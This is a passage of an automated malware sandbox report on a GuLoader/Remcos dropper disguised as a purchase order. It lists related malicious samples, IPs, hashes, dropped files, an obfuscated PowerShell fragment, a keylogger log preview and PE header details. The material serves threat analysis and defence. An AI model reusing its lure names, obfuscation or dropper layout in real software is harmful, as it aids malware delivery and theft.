geoplugin.net	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	GVV.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	178.237.33.50
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://www.jobserve.com/gb/en/Redirect/DirectoryUrl.jsrs?id=D678A952F7&L=https://freshpastacup.com/ximxi/MD5/BASE64EMAIL	Get hash	malicious	HTMLPhisher	Browse	104.21.17.5
	JJXXAhUWC.ps1	Get hash	malicious	Unknown	Browse	104.19.177.52
	Remittance Confirmation 5-2-2024.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Advice Ref A231k6Q1L2GQ.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	ls3wzs2VQr.rtf	Get hash	malicious	Unknown	Browse	104.21.84.67
	file.exe	Get hash	malicious	LummaC	Browse	104.21.51.78
	PO 2_5_24.xlam.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine	Browse	104.26.12.205
	SC-246214.doc	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	172.67.206.230
	file.exe	Get hash	malicious	LummaC	Browse	104.21.95.19
SWISSCOMSwisscomSwitzerlandLtdCH	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.222.96.21
	cvoBQP1Lxo.elf	Get hash	malicious	Mirai	Browse	170.17.254.60
	cqf3hb5Qxg.elf	Get hash	malicious	Mirai	Browse	146.4.138.28
	957URl9ErB.exe	Get hash	malicious	Socks5Systemz	Browse	193.222.96.219
	.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.222.96.21
	z39103_PN-EN-1090-1_A1_2012P.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.222.96.21
	z6FORMATOPROVEEDORESMETAX.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.222.96.21
	z77EU17439-FT-MILKYLUXGOUDAMILD.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.222.96.21
	sample.exe	Get hash	malicious	GuLoader, Remcos	Browse	193.222.96.21
	arm7.elf	Get hash	malicious	Mirai	Browse	164.204.161.205
ATOM86-ASATOM86NL	REVISED NEW ORDER 7936-2024.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	GVV.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	INQUIRY#46789-APRIL24_MAT_PRODUC_SAMPLE_PRODUCT.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	Evgh. rvs Armenia. 30.04.2024.exe	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	202404294766578200.xlam.xlsx	Get hash	malicious	Remcos	Browse	178.237.33.50
	PLOCMR-002 Dane dotycz#U0105ce dokument#U00f3w i towar#U00f3w.hta	Get hash	malicious	GuLoader, Remcos	Browse	178.237.33.50
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:c2e8c3b1-63be-4a97-a3b9-a21649a6fcff	Get hash	malicious	Remcos	Browse	178.237.33.50
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	178.237.33.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	er).xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.45.139
	SAL_000268_DOM.xls	Get hash	malicious	Unknown	Browse	104.21.45.139
	Teklif talebi BAKVENTA-BAKUUsurpationens.cmd	Get hash	malicious	GuLoader, Remcos	Browse	104.21.45.139
	5801.xls	Get hash	malicious	Unknown	Browse	104.21.45.139
	RFQ-LOTUS 2024.exe	Get hash	malicious	FormBook, GuLoader	Browse	104.21.45.139
	325445263.img	Get hash	malicious	Unknown	Browse	104.21.45.139
	Fact.NaturgyID300S220404024NOPA22442452256676545245PDR2PD04LF.msi	Get hash	malicious	Unknown	Browse	104.21.45.139
	Purchase Order05022024.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.45.139
	Notice.xls	Get hash	malicious	Unknown	Browse	104.21.45.139
	JlvRdFpwOD.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	104.21.45.139

Process:	C:\Program Files (x86)\Windows Mail\wab.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	965
Entropy (8bit):	5.023840386167536
Encrypted:	false
SSDEEP:	12:tkhXkmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qhXldRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	35B07141970464FE1515126EE76D86C8
SHA1:	BF560D7B92845B6DE04C7716CE1B62E4637E62E5
SHA-256:	B2A7CD5C3E618A0ADFAA1B65E49A88B29060CA7C165DB516C5B32D376A12D4E0
SHA-512:	D79DA10444FA33DDD7CE1DC12649D16E3E50C8E7E956487A62D9BAFC887F0C1B6B3761AE0E01ED5F72D86E078AD3897DC97A99F625E8FECA60F683D720C9BCD0
Malicious:	false
Preview:	{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.838950934453595
Encrypted:	false
SSDEEP:	192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
MD5:	4C24412D4F060F4632C0BD68CC9ECB54
SHA1:	3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
SHA-256:	411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
SHA-512:	6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
Malicious:	false
Preview:	PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aixlp5gq.pv0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fligowqj.ueh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nss8C29.tmp

Download File

Process:	C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
File Type:	data
Category:	dropped
Size (bytes):	933287
Entropy (8bit):	4.023153312007139
Encrypted:	false
SSDEEP:	6144:tvFQ7NN+jhgPdXJ1gSQ4TWTes7+sPiC4sBT+HwZH6SGMAcTET2Wv2TF9:FF02hGxJ1g5ThzXl9NGMAoET2CEF9
MD5:	F19A031D82122F3EA7EE4221061D7E9B
SHA1:	723C8D12308AF7C7A871C82F54882B2A84D3D300
SHA-256:	18E1A0548E9B27CD8D6B16CB89F93FB0206EAC3C4F5AC8B5C481F8F372AEA9CB
SHA-512:	11E4DA50F090FE01A3FF0697C068C01F6CB9D60B35DBC315C91A414A1CEAABD143C88C23352CC6E35BAA3086D47CAA0A31F1C9D2778A758BB975440C2BB7475B
Malicious:	false
Preview:	^'......,...................m............&......F'..........................................................................................................................................................................................................................................G...[...........Y...j...............................................................................................................................................5.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin

Download File

Process:	C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
File Type:	ASCII text, with very long lines (57553), with no line terminators
Category:	dropped
Size (bytes):	57553
Entropy (8bit):	5.3247790783781355
Encrypted:	false
SSDEEP:	768:m0xiUN/THk8c1Sj0n4pWSEQjVtcNd0cNdKFVJhYRsex2bxkqsIzzMqA+CA49:WUN/THkT1SvpWvQhtcv+FVH3D/PA/B9
MD5:	DE3E908D8A9B4EFD29F77F55D5305C5B
SHA1:	054248535582DDD0D7BB25C5C4757A9166763A15
SHA-256:	A60D0460A7535D710C8083D2801309C85E4C4799657A555D8B50EB413F9BF485
SHA-512:	E6A56F4FD7E9EF71BC874DF03D822F349470AC4E13A8ACFB16B2134E83579C7250CF8CB323EC17C9CB288601E51B9C615A57CBB403B85A3B35FF1EF3F6DAE001
Malicious:	true
Preview:	$Totlafholdenhed=$Differentialforstrker;<#Volapuker Mundheldene Overattachment Exhbn Sparrers Reinvolves #><#Hdersbevisningen creatin Everyness #><#Trolddomskrafts Injuranten Befordringsregler Reexposure Subreptary Worrisomely #><#Remeasuring Feterings afspaltningen Parritch Helbredelsesmetoders #><#Skrmtroldes Aksers Globals Bruttolnnens #><#Righteously Unbrutalises Amathophobia Formaler frisrsalonerne Bugswtr Rimens #><#Kampisternes Marshal Intervalhalverings #><#Tartralic Inoxidability epichorion #><#Unvolitioned metaphosphate Termobeholdere #><#Conchfish Lettedes Neuter #><#Amatrers Slvsmedjerne Coconsciously Kreditomkostning Apohyal Mundfuldene Podzolize #><#Linielngder Farmage Slvringens forbrndtes Unredeemably #><#Syvtiden Lecherousness Peptoniser Cushitic Tremmekalvens #><#Opdigtet Kassia Vellicated Dearnesses Materialhandel #><#Helicorubin Mikadoernes Faconstenens Sonnet Titikas Cumacean #><#Desertr Semiautomatic Indendrsarkitekternes #><#Burgee Interrogate Epilepsies Extravas

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Racialist.Pat

Download File

Process:	C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
File Type:	data
Category:	dropped
Size (bytes):	317991
Entropy (8bit):	7.705189106761701
Encrypted:	false
SSDEEP:	6144:NvFQ7NN+jhgPdXJ1gSQ4TWTes7+sPiC4sBT+HwZH6SGMA9:lF02hGxJ1g5ThzXl9NGMA9
MD5:	9BF43E283243F08A00430F29F3812BA0
SHA1:	A07E6AAD2B1C183F669B4910C37A9FC0C0F1944A
SHA-256:	5E601FBB39916B9CD2FBAAF0E3AA009D30850259559A485C79A87A2CA0F75E31
SHA-512:	38622D0D22EFB48BF2DAE77DF1D1C317E1BBA7C5271191F3E491D3A701D997BDB3A77A60455C4C16B549BA909BA98130F5A3F9B843E14DACC1E209C6193D2C59
Malicious:	false
Preview:	...oo............J....................+.......H......ss...................0.........................Y.:.gg.............................].d..__.............~~.....E...^.......................%%...RRR......^^^^.{..........q.....^....R......0.....................}}}}}}}}.......ccc......./.............fff....g..e......ZZ.............l.__.tttt.i./............................VVV....N.....G..XXX.FF......i............+....r...............{..xx.........!.............:.........%..W.....P............................\|\|\|.....===.................(.......`...............................j..............h..........................gg......y........S.......000........4..$$$.........///..{{{{..............O................:.....BBBB.::.......vvv.......6.000........55............./....CCCC............Q.........................k......hh..##...............................:....0.....i.......................@..............////....pppp.1...?................-...........1..................~........MMM.........f...

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	501264
Entropy (8bit):	7.514189430324988
Encrypted:	false
SSDEEP:	12288:pnPdsC9RjSmHcRhoKm3H4yfDBobpx2LzY9dW8FNOgM:1PdZWmHECHpBEpILzY9dW8+gM
MD5:	CBFE477536E5434005EC40A22C8B79EE
SHA1:	2FB42B99BB51041BBBE2DA96125AEB95EC1B4C02
SHA-256:	88079D533879C31B99A435C152016333280E0290B80F8F3AFBB28F2CCBC4B246
SHA-512:	BEEA18BC954059A6418DD4B7548350DCF95D4D3EB14B9DC7FA32B11D3E558BCE57BE765CDDBF99DE32CEAD9F3F4A37F57558C031337DB49E000D0FAE1B214365
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16% Antivirus: Virustotal, Detection: 11%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@................................. ;....@.........................................................p................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...@...............................rsrc............ ..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\refills.txt

Download File

Process:	C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
File Type:	ASCII text, with very long lines (306), with CRLF line terminators
Category:	dropped
Size (bytes):	477
Entropy (8bit):	4.2758031658111015
Encrypted:	false
SSDEEP:	12:/Sk0C6TMP4eCAEzbDll7gFV0peuMUkWOKKgzRxRkhrfEiMvct:/S5TMPzDEzbplEFV0peuMZJszRYu0t
MD5:	292E116B3003FAD8B824FF54B5222693
SHA1:	D3BE81A8A5404BE699A6A59B316D0E239F60F305
SHA-256:	A7AE5BDF2822C1941C09A9D3535F5B04934D914C16FED87BE1369EC3190ADAF7
SHA-512:	7DC7D2CEE6F5EE002C0049E45E5D58E02DA99AF40CCA7D81FC97853FA463404C6FA6425480DFA954E951B29353D69F81577237D94ECB24D9E06E8287223C9FD2
Malicious:	false
Preview:	sakramentet monicker organisten edderdunsdyne unnipped bolsmnds dysfunctional parrotism..camelopardalis overbeskftigelsen indvirkningerne mooley tornystrenes bovlstrup..brinkmanship stenbroernes efteruddanelseskurser,matmaking fibroadenia sharezer gaseosity vaporiferous falks.underskriftindsmlings skovmaars absurd simulering cerebrotonic harmonisations dmpnings.dioptometre dowser annullwlr overgirded triplicity rosenbedet glorificeredes glsningerne lombrosian mttere waag..

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\spejderlejrene.hum

Download File

Process:	C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
File Type:	data
Category:	dropped
Size (bytes):	276710
Entropy (8bit):	0.15969803423381917
Encrypted:	false
SSDEEP:	96:Y8nH0PyxSEySqWNnJryMrPle1okR1pVK+W7t49hTc:Y8H0KxrqWxNPle1nR7VKB7t49hY
MD5:	B85779B542E03E21F26DB4C58587204F
SHA1:	BB0BD37AEEC3339DBD8A1BBE8E879549C84E29A0
SHA-256:	BB1827D75495F93A729C94844AD2E17E9E211AEBEE5B6BB8574314C455BA95E6
SHA-512:	9F894F912B040282554A2F8A67CFDDEC7D9AC30739BF4E04E2EE18D440F3287CFBEF45E7B8E7D3F95D846330B457CE5C1FFAB423CB7E30F014EAD29252434FEA
Malicious:	false
Preview:	......................................................................2.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\gatfinnernes.tel

Download File

Process:	C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
File Type:	DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.000122
Category:	dropped
Size (bytes):	100609
Entropy (8bit):	0.15377383202349873
Encrypted:	false
SSDEEP:	48:WNo92FmrnJoUPwwYJ+LW//XVWZJNBD9dGG0E:WNe5oUPwwi+LW/wZJNBBoE
MD5:	C3F66924A836D18C62CD39BCA76A4686
SHA1:	35F86E33B8EFA49B17C0EE1E11A82829D93662DD
SHA-256:	A99DEBA735D90BA79B85356E47CFCBCBD959BDEA538EBD9126715730EAEFE08A
SHA-512:	EF16C0BEB61ECA149BD37AC5D7560CE6D1471849304DA2A25EF3B38C69656AB2F3FA2425A5CB82C1AD2B06F90521EE31843A1D4E0E49E9BE6D41B7F8D8970A9E
Malicious:	false
Preview:	...........................................................................................................................................................................................9................................................................................................................................................................................................................................................................................................................A........................................................................................................................................7..............................................................h......u....................................................................................................................................................................Y.......................................................................................................................................

C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\menja.lam

Download File

Process:	C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
File Type:	data
Category:	dropped
Size (bytes):	169841
Entropy (8bit):	0.16017172270085472
Encrypted:	false
SSDEEP:	96:38f7y3AcZmvLQEZVVMeAlqKNV2Zp3yHstq:o7y3AcZmsEZVVMeAlqRp3y+q
MD5:	8AFCC792B0E9516C3B43CCEBEE7EACC1
SHA1:	8C4DDCEA5941F087B85B535FF08AE9ECFFD7607E
SHA-256:	944F29A96DF1077575C114A18F04CF233FD2E6E82BB083A6D7D85CDAF5C7E613
SHA-512:	3FFB0508E68FB675C758E55160FA957EE234A4FC85515C376317FF2641D408433AC295EB628F7155801B1EAF50F4B04A24A3DE14C1C2A43A2BE506A5500A4EA7
Malicious:	false
Preview:	................................................................@...............................x..............................................................................................................................................X...........................................................................................................................A....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................%.......................................................................................................................................

C:\Users\user\AppData\Roaming\fvberms.dat

Download File

Process:	C:\Program Files (x86)\Windows Mail\wab.exe
File Type:	data
Category:	dropped
Size (bytes):	234
Entropy (8bit):	3.3499572149302352
Encrypted:	false
SSDEEP:	3:rhlKlFlNlNEfwb5JWRal2Jl+7R0DAlBG4moojklovDl6ALilXIkqoojklovDl6v:6lNc4b5YcIeeDAlS1gWAAe5q1gWAv
MD5:	66C1C6E5B10666A662B0D7AC4853EDAD
SHA1:	8CA99DB17529B32DA54CFE32B99A2E8DAC824D6B
SHA-256:	B74BA832CAD4B883F68AC18AF3904823A8C62D7D7095FA1C4593DA7F4908CC7B
SHA-512:	2DE4FC88F2D36E527CD16044E003E0C851DD3E4786AD12346600D01B268B3E52C97CFBC9154F9A4C3F886ABCB4365FC50331727636A2DFD3BDA00EC3DA569207
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\fvberms.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.0.5./.0.2. .1.9.:.0.1.:.5.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.514189430324988
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO-USC-22USC-KonchoCo.exe
File size:	501'264 bytes
MD5:	cbfe477536e5434005ec40a22c8b79ee
SHA1:	2fb42b99bb51041bbbe2da96125aeb95ec1b4c02
SHA256:	88079d533879c31b99a435c152016333280e0290b80f8f3afbb28f2ccbc4b246
SHA512:	beea18bc954059a6418dd4b7548350dcf95d4d3eb14b9dc7fa32b11d3e558bce57be765cddbf99de32cead9f3f4a37f57558c031337db49e000d0fae1b214365
SSDEEP:	12288:pnPdsC9RjSmHcRhoKm3H4yfDBobpx2LzY9dW8FNOgM:1PdZWmHECHpBEpILzY9dW8+gM
TLSH:	82B42306ABA4C426EC531534C9A9CCFB4A76AD28CB4C46075B20FFAF7D732560A1E357
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...g..d.................h...".....

File Icon


Icon Hash:	2951ea4c6d0f968e

Static PE Info

General

Entrypoint:	0x403645
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC67 [Sun Jul 2 02:09:43 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	9dda1a1d1f8a1d13ae0297b47046b26e

Authenticode Signature

Signature Valid:	false
Signature Issuer:	E=Bitters@Totalfredes.Buk, O=Transcription, OU="unfellied Iceboats ", CN=Transcription, L=Tilloy-lez-Marchiennes, S=Hauts-de-France, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	13/03/2024 07:01:13 13/03/2027 07:01:13
Subject Chain	E=Bitters@Totalfredes.Buk, O=Transcription, OU="unfellied Iceboats ", CN=Transcription, L=Tilloy-lez-Marchiennes, S=Hauts-de-France, C=FR
Version:	3
Thumbprint MD5:	1C36729D4FECA7597E6CF4C05574ACDF
Thumbprint SHA-1:	13C1FB7527A282EC623A8D2DF2E0F9647FCBA97D
Thumbprint SHA-256:	11C2ABA375A2240CAD6D442F09511DBF58C250D586B3A3B655455FA5BDED698C
Serial:	777ACF2875711BE4012CA88C2467AD7E32B70A90

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A230h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A0h]
mov esi, dword ptr [004080A4h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F685CFFD8CAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F685CFFD898h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [00429B18h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4e000	0x21fc0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x78d70	0x18a0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66b7	0x6800	e65344ac983813901119e185754ec24e	False	0.6607196514423077	data	6.4378696011937135	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
